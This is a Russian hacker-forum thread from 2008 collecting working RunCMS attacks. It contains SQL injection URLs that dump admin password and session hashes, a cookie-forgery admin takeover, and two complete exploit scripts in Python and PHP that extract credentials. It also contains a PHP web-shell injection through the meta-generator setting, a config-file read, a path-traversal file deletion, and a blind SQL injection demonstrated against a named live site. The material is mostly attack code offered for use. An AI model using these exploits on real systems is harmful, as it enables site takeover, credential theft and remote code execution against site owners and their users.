Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.04.2008, 04:39
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Способ если прокатила скуля и нет возможности сбрутить хеш!
1. Регаем акк на сайте (жертва)
2. В моем случае проведенная скуль имела вид
Код:
modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,hash,4,5,uname,7,8,9,10+from+runcms_session+where+uid=3
Таким макаром выводим hash-session админа (не забываем про id)!
Вывело что-то в этом роде eb5cafcd8afa7edf125edfa35c55c73e425bd1d0
3. Логонимся под реганым акком, смотрим наши куки
Примерно вот такой вид:
Код:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%
наш id = 20001
и сессия = e2ef357450c7c647fa5c813808d1500273407483
4. Меняем на id админа (в моем случае id = 00003) и сессия = eb5cafcd8afa7edf125edfa35c55c73e425bd1d0
Получаем след.:
Код:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2200003%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7D
Менял куки через плагин в лисе ставил галку напротив Session cookies и обновлял страницу .
И мы в админке.
Спасибо за внимание! |
|
|
30.04.2008, 21:27
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability
Vuln code:
PHP код:
.....
global $xoopsConfig, $db, $HTTP_POST_VARS, $myts, $eh;
$lid = $HTTP_POST_VARS['lid'];
$title = $HTTP_POST_VARS['title'];
.....
Exploit:
Код:
/modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users
ZAMUT (c)
|
|
|
|
04.05.2008, 18:22
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
RunCMS Module Arcade 1.28 (gid) Remote SQL Injection Vulnerability
Vuln code:
PHP код:
global $HTTP_POST_VARS, $HTTP_GET_VARS, $myts;
$commit = isset($HTTP_POST_VARS['commit']) ? $HTTP_POST_VARS['commit'] : $HTTP_GET_VARS['commit'];
$gid = isset($HTTP_POST_VARS['gid']) ? $HTTP_POST_VARS['gid'] : $HTTP_GET_VARS['gid'];
Exploit:
Код:
/index.php?act=play_game&gid=-999999+union+select+1,2,3,4,pass,6,7,8,9,10,11,12,13,14+from+runcms_users
ZAMUT(c)
|
|
|
|
09.05.2008, 10:09
|
|
Познающий
Регистрация: 01.01.2008
Сообщений: 91
Провел на форуме:
994508
Репутация:
143
|
|
RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit
Код:
#!/usr/bin/python
"""
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This is a public Exploit #
#=================================================================================================#
# Runcms <= 1.6.1 #
# Sql Injection Vulnerability #
# Benchmark Method #
#=================================================================================================#
# .-= In memory of our friend rGod =-. #
#====================================#===========#====================================#===========#
# Server Configuration Requirements # # Some Information # #
#====================================# #====================================# #
# # #
# magic_quotes_gpc = 0 # Vendor: runcms.org #
# # Author: The:Paradox #
#================================================# Severity: Moderately Critical #
# # #
# Uff... I have to find something to put here... # Proud To Be Italian. #
# # #
#====================================#===========#================================================#
# Proof Of Concept / Bug Explanation # #
#====================================# #
# #
# This time i'm really too lazy to write a long PoC. #
# $msg_image (but also $msg_attachment) is unproperly checked when calling store() #
# function (modules/messages/class/pm.class.php) #
# Sql injection in insert syntax (whatever I am not using blind attack). Prefix knowledge needed. #
# #
#=================================================================================================#
[modules/messages/class/pm.class.php]
64. function store() {
65. global $db, $upload;
66.
67. if ( !$this->isCleaned() ) {
68. if ( !$this->cleanVars() ) {
69. return false;
70. }
71. }
72.
73. foreach ( $this->cleanVars as $k=>$v ) {
74. $$k = $v;
75. }
76.
77. if ( empty($msg_id) ) {
78.
79. $msg_id = $db->genId($db->prefix('private_msgs').'_msg_id_seq');
80.
81. $sql = "
82. INSERT INTO ".$db->prefix("private_msgs")." SET
83. msg_id=".intval($msg_id).",
84. msg_image='$msg_image',
85. msg_attachment='$msg_attachment',
86. subject='$subject',
87. from_userid=".intval($from_userid).",
88. to_userid=".intval($to_userid).",
89. msg_time=".time().",
90. msg_text='$msg_text',
91. read_msg=0,
92. type='".$type."',
93. allow_html=".intval($allow_html).",
94. allow_smileys=".intval($allow_smileys).",
95. allow_bbcode=".intval($allow_bbcode).",
96. msg_replay=".intval($msg_replay)."";
97. }
98.
99. if ( !$result = $db->query($sql) ) {
100. $this->errors[] = _NOTUPDATED;
101. return false;
102. }
103.
104. return true;
105. }
#=================================================================================================#
# There are other vulnerabilities in this CMS. Find them by yourself. #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
"""
import urllib, urllib2
from sys import argv, exit
main = """
#================================================================#
# Runcms <= 1.6.1 #
# Sql Injection Vulnerability #
# Discovered By The:Paradox #
# #
# rGod is still alive in our hearts #
# #
# Usage: #
# ./homerun [Target+path] [TargetUid] [ValidUserCookie] #
# ./homerun --help (to print an example) #
#================================================================#
"""
prefix = "runcms_"
if len(argv)>=2 and argv[1] == "--help":
print "\nuser@linux:~/Desktop$ ./homerun http://localhost/web/runcms/ 1 rc_sess=a%3A3%3A%7Bi%3A0%3Bi%3A3%3Bi%3A1%3Bs%3A40%3A%228b394462d67198707aea362098001610d35687ff%22%3Bi%3A2%3Bi%3A1212933002%3B%7D;\n\n" + main + "\n\n[.] Exploit Starting.\n[+] Sending HTTP Request...\n[+] A message with username and password of user with id 1 has been sent to user with id 3.\n -= The:Paradox =-"
else: print main
if len(argv)<=3: exit()
else: print "[.] Exploit Starting."
host = argv[1]
tuid = argv[2]
cookie = argv[3]
try: uid = cookie.split("a%3A3%3A%7Bi%3A0%3Bi%3A")[1].split("%3Bi%3A1%3Bs%3A40%3A%")[0]
except: exit("[-] Invalid cookie")
sql = "icon12.gif', msg_attachment='', subject='Master, all was done.', from_userid=" + str(uid) + ", to_userid=" + str(uid) + ", msg_time=0, msg_text=concat('Master, password hash for ',(select uname from " + prefix + "users where uid=" + tuid + "),' is ',(select pass from " + prefix + "users where uid=" + tuid + ")), read_msg=0, type='1', allow_html=0, allow_smileys=1, allow_bbcode=1, msg_replay=0/*"
print "[+] Sending HTTP Request..."
values = {'subject' : 'Master attack failed.',
'message' : 'Probably mq = 1 or system patched.',
'allow_html' : 0,
'allow_smileys' : 1,
'allow_bbcode' : 0,
'msg_replay' : 1,
'submit' : '1',
'msg_image' : sql,
'to_userid' : uid }
headers = {'Cookie' : cookie,
'Content-Type' : 'application/x-www-form-urlencoded'}
req = urllib2.Request(host + "/modules/messages/pmlite.php", urllib.urlencode(values), headers)
response = urllib2.urlopen(req)
if response.read().find('Your message has been posted.') != -1: print "[+] A message with username and password of user with id " + tuid + " has been sent to user with id " + uid + ".\n -= The:Paradox =-"
else: print "[-] Unable to send message"
# milw0rm.com [2008-05-08]
|
|
|
|
19.05.2008, 21:58
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
в админке
Читалка (все версии).
конфиг к бд
Код:
http://localhost/runcms/class/debug/highlight.php?file=../../mainfile.php
можно троянить все странички cms:
Тут радактируем хидер либо футер, как нам нужно, я вставлял ифр 
Код:
http://localhost/runcms/modules/system/admin.php?fct=meta-generator
ну и хз за чем они нужны, но пусть будут. SQL-inj.
Код:
/modules/system/admin.php?fct=smilies&op=SmilesEdit&id=-1+union+select+1,pass,3,4+from+runcms_users
/modules/system/admin.php?fct=userrank&op=RankForumEdit&rank_id=-1+union+select+1,pass,3,4,5,6+from+runcms_users
ZAMUT (c)
Последний раз редактировалось ZAMUT; 19.05.2008 в 22:00..
|
|
|
|
05.06.2008, 19:10
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Заливка шелла в RunCMS
Заливка шелла в RunCMS
через Meta-Generator
Уязвимый кусок кода:
Код:
.......
$content .= "\$meta['follow'] = \"".$_POST["Xfollow"]."\";\n";
$content .= "\$meta['pragma'] = \"".$_POST["Xpragma"]."\";\n";
$content .= "\$meta['icon'] = \"".$_POST["Xicon"]."\";\n";
.......
write_file("meta", $content, "w");
Идем в:
Код:
http://localhost/runc/modules/system/admin.php?fct=meta-generator
поле Bookmark Icon имеет вид:
правим так:
Код:
../../favicon.ico";echo `$_REQUEST[c]`;#
теперь файл с этой опцией (\modules\system\cache\meta.php) выглядит так:
Код:
.........
$meta['rating'] = "general";
$meta['p3p'] = "";
$meta['index'] = "index";
$meta['follow'] = "follow";
$meta['pragma'] = "";
$meta['icon'] = "../../favicon.ico";echo `$_REQUEST[c]`;#";
.........
Т.е. классический php-injection, как видим теперь все зависит от нашей фантазии
используем так:
Код:
http://localhost/runc/modules/system/admin.php?fct=meta-generator&c=dir
Имхо, метод вообще безпалевный (когда юзать будем POST) 
Так же, как вариант, можно инклудить смайл/аватарку с добавленным в нее php-кодом (после заливки лежать она будет тут ../../images/smilies/smile.gif )
ZAMUT (c)
Последний раз редактировалось ZAMUT; 27.11.2008 в 14:17..
|
|
|
|
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure ex |
26.06.2008, 18:57
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure ex
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit
PHP код:
<?php
print_r('
--------------------------------------------------------------------------
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials
disclosure exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org
dork: "Runcms Copyright" "2002 - 2007" +"page created"
---------------------------------------------------------------------------
');
/*
software site: http://www.runcms.org/modules/news/
vulnerable code in /class/debug/debug_show.php:
<?php
...
include_once("../../mainfile.php");
include_once("../../header.php");
switch($_POST['debug_show']) {
case "show_files":
show_files($_POST['loaded_files']);
break;
case "show_queries":
show_queries($_POST['executed_queries'], $_POST['sorted']);
break;
}
include_once("../../footer.php");
?>
no authentication is performed to run show_files() and show_queries()
functions, look at this now in /class/debug/debug.php:
...
function show_queries($executed_queries, $sorted=0)
{
global $db;
$executed_queries = unserialize(urldecode($executed_queries));
if ($sorted == 1)
{
sort($executed_queries);
$is_sorted = _DBG_SORTEDR;
}
else
{
array_reverse($executed_queries);
$is_sorted = _DBG_NSORTEDR;
}
OpenTable();
$fulldebug = "
<h4>($is_sorted) "._DBG_QEXECED.": ".count($executed_queries)."</h4>
<table width='100%' cellpadding='3' cellspacing='1'>";
$size = count($executed_queries);
for ($i=0; $i<$size; $i++)
{
$stime = get_micro_time();
$query = $db->query("EXPLAIN ".$executed_queries[$i]."");
$querytime = (get_micro_time() - $stime);
$totaltime += $querytime;
$fulldebug .= "<tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_QUERY.": ".($i+1)."</b></td>
<td colspan='7' class='bg3'>$executed_queries[$i]</td>
</tr><tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TIME.":</b></td>
<td colspan='7' class='bg3'>".round($querytime, 4)." "._DBG_SECONDS."</td>
</tr><tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TABLE.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TYPE.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_POSSKEYS.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEY.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEYLEN.":</b></td>
<td nowrap='nowrap' class='bg2'><b>ref:</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_ROWS.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_EXTRA.":</b></td>
</tr>";
while ($result = $db->fetch_array($query))
{
$fulldebug .= " <tr>
<td class='bg3' nowrap='nowrap' {$result['table']} </td>
<td class='bg3' nowrap='nowrap' {$result['type']} </td>
<td class='bg3'>{$result['possible_keys']} </td>
<td class='bg3' nowrap='nowrap' {$result['key']} </td>
<td class='bg3' nowrap='nowrap' {$result['key_len']} </td>
<td class='bg3' nowrap='nowrap' {$result['ref']} </td>
<td class='bg3' nowrap='nowrap' {$result['rows']} </td>
<td class='bg3'>{$result['Extra']} </td>
</tr>";
}
$fulldebug .= "<tr>
<td colspan='8' class='bg1'>"._DBG_CUMULATED.":".round($totaltime, 4)." "._DBG_SECONDS."<hr noshade></td>
</tr>";
}
$fulldebug .= "</table>";
echo $fulldebug;
CloseTable();
}
...
we have a nice kind of sql injection here!
also show_files function can be used to check the existence of certain files
and retrieve the filesize or if it has been modified and so on...
*/
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to runcms
Options:
-p[port]: specify a port other than 80
-P[ip:port]: "" a proxy
-T[prefix] "" a table prefix (default: runcms)
Example:
php '.$argv[0].' localhost /runcms/ -P1.1.1.1:80
php '.$argv[0].' localhost / -Trcms -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function send($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
$parts[1]=(int)$parts[1];
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="runcms";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
echo "md5 hash -> ";
$j=1;$password="";
while (!strstr($password,chr(0))){
for ($i=0; $i<=255; $i++){
if (in_array($i,$md5s)){
$executed_queries=array();
//original query: EXPLAIN ...
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(pass,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
$sql=urlencode(serialize($executed_queries));
$sql=str_replace("%22","%2522",$sql);//you know, urldecode()...
$data ="debug_show=show_queries";
$data.="&executed_queries=".$sql;
$data.="&sorted=1";
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
send($packet);
if (eregi("_users </td>",$html)){$password.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
echo "\n";
echo "admin username -> ";
$j=1;$admin_user="";
while (!strstr($admin_user,chr(0))){
for ($i=0; $i<=255; $i++){
$executed_queries=array();
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(uname,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
$sql=urlencode(serialize($executed_queries));
$sql=str_replace("%22","%2522",$sql);
$data ="debug_show=show_queries";
$data.="&executed_queries=".$sql;
$data.="&sorted=1";
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
send($packet);
if (eregi("_users </td>",$html)){$admin_user.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
?>
original url: http://retrogod.altervista.org/runcms_152_sql.html
|
|
|
|
20.07.2008, 01:12
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Как узнать версию ?
/index.php
PHP код:
<meta name="robots" content="index, follow" />
<meta name="generator" content=" RUNCMS 1.5.3 (build 20071016)" />
<meta name="keywords" content="enter your keywords here" />
<meta name="description" content="Enter your site description here" />
__________________
в строю
|
|
|
|
21.07.2008, 00:05
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
RunCMS Module Upload Center Delete File Vulnerability
version: latest -- 1.01
Showing list files Vulnerability
Vuln Code:/folder.php
PHP код:
function listfiles() {
global $ucConfig, $xoopsUser, $_GET;
if (!$xoopsUser) {
header("Location:".XOOPS_URL."/whyregister.php");
}
else {
$foldername = $_GET['foldername'];
$userfoldername = $xoopsUser->getVar("uid");
$userfolderpath = "./cache/files/".$userfoldername;
$imgurl = XOOPS_URL."/modules/uc/cache/files/".$userfoldername."/".$foldername;
$imgpath = "./cache/files/".$userfoldername."/".$foldername;
$subfolderpath = $userfolderpath."/".$foldername;
$total = dir_stats($userfolderpath);
.....
Delete File Vulnerability
Vuln Code:/folder.php
PHP код:
function deletefile() {
global $xoopsUser, $_POST;
$filename = $_POST['filename'];
$foldername = $_POST['foldername'];
$userfoldername = $xoopsUser->getVar("uid");
if ( @file_exists("./cache/files/".$userfoldername."/".$foldername."/".$filename) ) {
@unlink("./cache/files/".$userfoldername."/".$foldername."/".$filename);
redirect_header("folder.php?op=listfiles&foldername=".$foldername, 3, _MD_FILEDELETEOK);
}
}
Код:
<form action="folder.php" method="post"><td width="1%" nowrap><input type="hidden" name="op" value="deletefile" />
<input type="hidden" name="foldername" value="../../../../../" /><input type="hidden" name="filename" value=".htaccess" />
<input type="submit" class="button" value="Delete"></td></form>
ZAMUT ©
__________________
в строю
Последний раз редактировалось ZAMUT; 21.07.2008 в 00:07..
|
|
|
|
Уязвимости модулей RunCMS |
16.12.2008, 01:05
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Уязвимости модулей RunCMS
RunCMS Module eCal 2.4 Blind-SQL
Уязвимый продукт: Module eCal
Версия: <= 2.4
Линк: http://www.runcms.ru/modules/files/showfile.php?lid=95
Дорк: "inurl:modules/ecal/"
Blind-SQL
Уязвимость в файле localleve.php.
Уязвимый кусок кода:
PHP код:
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE stamp >= \"$currentyear-$currentmonth-$currentday 00:00:00\" AND locationid =$lid AND valid ='yes' ORDER BY stamp");
$kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");
Exploit:
Код:
true: /modules/ecal/localleve.php?lid=1+and+1=1
false: /modules/ecal/localleve.php?lid=1+and+1=2
Example:
Код:
true: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=5
false: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=4
__________________
Feci, quod potui. Faciant meliora potentes.
Последний раз редактировалось Ded MustD!e; 16.12.2008 в 01:08..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
